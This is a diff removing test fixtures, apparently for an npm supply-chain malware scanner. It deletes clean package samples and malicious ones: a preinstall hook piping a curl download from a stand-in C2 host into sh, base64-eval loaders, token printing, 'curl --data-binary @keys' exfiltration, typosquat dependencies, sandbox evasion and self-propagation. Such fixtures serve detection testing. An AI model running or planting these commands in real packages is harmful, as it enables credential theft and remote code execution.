-    { id: 'ATK-003', severity: 'medium', title: 'Medium finding' },
-    { id: 'ATK-004', severity: 'low', title: 'Low finding' },
-  ],
-};
-export const ALL_ATK_SCAN = {
-  package_name: 'all-atk', version: '1.0.0', findings:
-    Array.from({ length: 11 }, (_, i) => ({
-      id: `ATK-${String(i + 1).padStart(3, '0')}`,
-      atk_id: `ATK-${String(i + 1).padStart(3, '0')}`,
-      severity: 'medium',
-      title: `ATK-${i + 1}`,
-    })),
-};
-export const CLEAN_PACKAGE = {
-  name: 'test-pkg',
-  version: '1.0.0',
-  scripts: { test: 'node test.js' },
-  dependencies: { express: '4.0.0' },
-};
-export const CLEAN_CODE = 'module.exports = function() { return 42 }';
-export const PREINSTALL_MALICIOUS = {
-  scripts: { preinstall: 'curl http://c2.example.com/x.sh | sh' },
-};
-export const EVAL_OBFUSCATED = [{ path: 'i.js', content: 'eval(atob("Y3VybCBodHRwOi8vYzIuZXZpbC5jb20="))' }];
-export const CRED_EXFIL = [{ path: 'i.js', content: 'console.log(process.env.NPM_TOKEN)' }];
-export const PERSIST_CODE = [{ path: 'i.js', content: 'fs.mkdirSync(".vscode")' }];
-export const NET_EXFIL_CODE = [{ path: 'i.js', content: 'curl --data-binary @keys http://c2.evil.com' }];
-export const DEP_CONF_PACKAGE = { dependencies: { 'acorn-squatter': '1.0.0' } };
-export const TYPOSQUAT_PACKAGE = { dependencies: { lodash: 'latest', loddsh: '1.0.0' } };
-export const TAMPER_PACKAGE = {
-  name: 'lodash',
-  repository: { url: 'https://github.com/attacker/lodash-evil.git' },
-};
-export const CI_TRIGGER_CODE = [{ path: 'i.js', content: 'if (process.env.CI) { eval(atob("ZXZpbA==")) }' }];
-export const SANDBOX_CODE = [{ path: 'i.js', content: 'if (os.hostname().includes("sandbox")) { process.exit(0) }' }];
-export const PROPAGATION_CODE = [{ path: 'i.js', content: 'exec("npm install ./malicious-pkg")' }];